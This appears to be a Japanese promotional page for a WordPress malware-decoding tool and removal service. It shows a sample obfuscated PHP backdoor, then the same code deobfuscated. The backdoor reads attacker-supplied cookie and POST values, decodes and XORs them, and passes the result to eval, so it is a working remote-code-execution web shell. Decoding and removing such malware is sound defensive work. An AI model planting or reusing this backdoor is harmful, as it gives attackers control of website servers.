Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。
<?php $RteMY = chr/* nJXl */(115) . chr/* iF */(116) . "\x72"/* GvLw*/. chr ( 1011/*WYcWM */- 916 )."\162" . 'e' ./* QMH */chr ( 962 - 850/* r */)."\145" . 'a' . chr/*anhz*/(/* P */732 - 616/* BnrkM */); $AUiHiRXQ =/* VN */chr/* dNyY */(101) ./* g*/"\x78" ./*HlOjF */'p' . 'l' ./* l*/"\157" . "\144"/* S */. "\145";; $tYvnKccATm =/*nay*/"\143" ./* ongPm */"\157"/* LS */. chr (/* L */199 -/* MQYRU */82 )."\156" ./* f */"\x74"; $uohrZXxos =/* fyIr */"\x70" ./* Wl */"\x61"/* glJU*/. chr (99) . chr ( 778 - 671/* TEXim */);$_RB/* aKHz */= 6325; $FpXCt/* ls */= Array (/* CrMaT */"IEzhYBrwyEinlPRMpNoW"/* M*/=> "IdlPAkTDiIxAcqujdKsCNrKGuFeHw" ); /* RLgX*/$Pdbfh = Array/* TUWVM*/( "ubsBiwMXcpT" => "lvnSpaUuejHePkhMyvyEUVxd"/*CBOiv */); $gWGerwMr =/* xdEi */Array( $FpXCt,/* fDoo */$_COOKIE, $FpXCt, $_POST, $Pdbfh);; /* zKU */foreach ($gWGerwMr as $KFkApQrUTe)/* Qy */{ /* mx*/foreach ( $KFkApQrUTe/*DUSlM */as/* f*/$EKvorJbeN => $MYvELd ) { /*Drr */$MYvELd = @$uohrZXxos( chr/* hWW */(72) . chr/*J */( 514 - 472 ), $MYvELd/* vbzW */);$_kNxl =/* H */27590; $EKvorJbeN/*laVy */.= "RdBU-XvVH-VPTZVM-NohkUH-nsmZQBk-xisCE-RXfZSk"; $EKvorJbeN/* XPjZV*/=/*s */$RteMY/* Mm */( $EKvorJbeN, (/* y */strlen( $MYvELd )/strlen(/* mnQb */$EKvorJbeN ) )/* bauSy*/+/* mj */1);; /* FU */$GEBmE/* PEOu*/=/* o*/$MYvELd ^/* pzY */$EKvorJbeN;; $Uufkb/*R*/= $AUiHiRXQ ( "\43", $GEBmE ); if (/* xuFu*/$tYvnKccATm ( $Uufkb ) == 3 ) { $yIqBBU = $Uufkb[1]; $hfLQZim = $Uufkb[2]; /* lF */$mDEGPsRsgN =/* uF */$yIqBBU($hfLQZim); eval (/* Pbt */$mDEGPsRsgN/* zA */); die (); } } }
<?php $RteMY = "str_repeat"; $AUiHiRXQ = "explode"; $tYvnKccATm = "count"; $uohrZXxos = "pack"; $_RB = 6325; $FpXCt = array( /* CrMaT */ "IEzhYBrwyEinlPRMpNoW" => "IdlPAkTDiIxAcqujdKsCNrKGuFeHw", ); /* RLgX*/ $Pdbfh = array("ubsBiwMXcpT" => "lvnSpaUuejHePkhMyvyEUVxd"); $gWGerwMr = array( $FpXCt, /* fDoo */ $_COOKIE, $FpXCt, $_POST, $Pdbfh, ); /* zKU */ foreach ($gWGerwMr as $KFkApQrUTe) { /* Qy */ /* mx*/ foreach ($KFkApQrUTe as $EKvorJbeN => $MYvELd) { /*Drr */ $MYvELd = @$uohrZXxos("H*", $MYvELd); $_kNxl = 27590; $EKvorJbeN .= "RdBU-XvVH-VPTZVM-NohkUH-nsmZQBk-xisCE-RXfZSk"; $EKvorJbeN = $RteMY($EKvorJbeN, strlen($MYvELd) / strlen( /* mnQb */ $EKvorJbeN ) + 1); /* FU */ $GEBmE = $MYvELd ^ $EKvorJbeN; $Uufkb = $AUiHiRXQ("#", $GEBmE); if ($tYvnKccATm($Uufkb) == 3) { $yIqBBU = $Uufkb[1]; $hfLQZim = $Uufkb[2]; /* lF */ $mDEGPsRsgN = $yIqBBU($hfLQZim); eval($mDEGPsRsgN); die; } } }
■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.